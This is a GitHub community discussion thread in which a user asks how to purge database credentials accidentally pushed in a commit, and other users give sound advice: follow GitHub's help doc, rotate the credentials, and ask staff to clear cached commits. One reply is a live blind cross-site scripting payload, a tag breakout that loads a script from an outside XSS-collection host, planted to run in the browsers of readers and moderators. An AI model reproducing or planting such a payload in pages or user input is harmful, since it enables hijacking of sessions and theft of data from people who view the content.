### DISCUSSION TITLE
😖 I accidentally pushed sensitive info!

### DISCUSSION THREAD

**Discussion by tzmanics** [community/community#21529] [New to GitHub]
<p>I accidentally pushed a commit that listed my database credentials. How can I change that commit and make sure that information isn’t listed in my history?<br>
:bowing_man: thank you in advance for any help!</p>

**Comment by ElizabethN** [comment, marked as answer]
<p>HIiiiii! This totally happens sometimes, and you are not alone! In fact, it happens enough that we have a whole Help Doc on this: <a href="https://help.github.com/articles/removing-sensitive-data-from-a-repository/" rel="nofollow noopener">https://help.github.com/articles/removing-sensitive-data-from-a-repository/</a>.</p>
<p>I hope that helps and good luck! :heart:</p>

**Reply by pwnkunwar** [reply]
'"><script src=https://xss.report/c/blind1212123></script>

**Comment by alexdresko** [comment]
<p>Ironically, you may have posted sensitive info when you created this post --&gt; your github username.  If you pushed sensitive information to a public repository, your original post implicitly told careful readers exactly where to go to find that sensitive information. </p>

**Comment by jamierocks** [comment]
<p>It’d probably be wise to change the credentials now also.</p>
<p>AFAIK GitHub does not garbage collect, so anyone with the commit ID can still view the commit (even through the GitHub UI).</p>

**Comment by cmrberry** [comment]
<p>Yeah, I’d consider the credentials compromised at this point as well. That being said, as it mentions in the Help Doc <a class="mention" href="/elizabethn">@elizabethn</a> pointed <a class="mention" href="/tzmanics">@tzmanics</a> to, we can gc and clear the cache on a repository as needed. You just have to let us know that you’ve already done the other steps in that doc and then we’re happy to help make sure that the old URL is inaccessible :) </p>
